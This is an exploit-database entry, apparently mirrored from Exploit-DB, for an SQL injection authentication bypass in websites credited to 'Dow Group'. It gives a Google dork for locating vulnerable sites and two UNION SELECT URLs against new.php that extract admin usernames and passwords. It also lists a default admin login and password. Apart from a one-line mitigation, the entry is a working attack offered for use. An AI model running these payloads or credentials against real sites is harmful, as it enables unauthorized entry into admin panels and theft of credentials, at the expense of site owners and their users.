header-logo
Suggest Exploit
vendor:
N/A
by:
ProF.Code
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Dow Group admin by pass (new.php)

This vulnerability allows an attacker to bypass authentication and gain access to the admin panel of a website powered and designed by Dow Group. The attacker can use the Google dork 'intext:"powered and designed by Dow Group"' to find vulnerable websites. The attacker can then use the demo URL to bypass authentication and gain access to the admin panel. The default username and password are 'nabadmin' and 'nabadmin_123' respectively.

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

=====================================
| Dow Group admin by pass (new.php)
=====================================
Author:ProF.Code
Email :adt@hotmail.com
=====================================
~~~~~~~~~~~~~~~~~~~~
dork(google) : intext:"powered and designed by Dow Group"
~~~~~~~~~~~~~~~~~~~~
demo (username): http://server/new.php?id=-9+union+select+1,user_name,3,4+from+admin
demo (password) : http://server/new.php?id=-9+union+select+1,password,3,4+from+admin
user : nabadmin
pass : nabadmin_123
=============================================================

#====GreeTZ===============#
#all my friends in my email #
#======================#

Navigation

Suggest Exploit

Services By CQR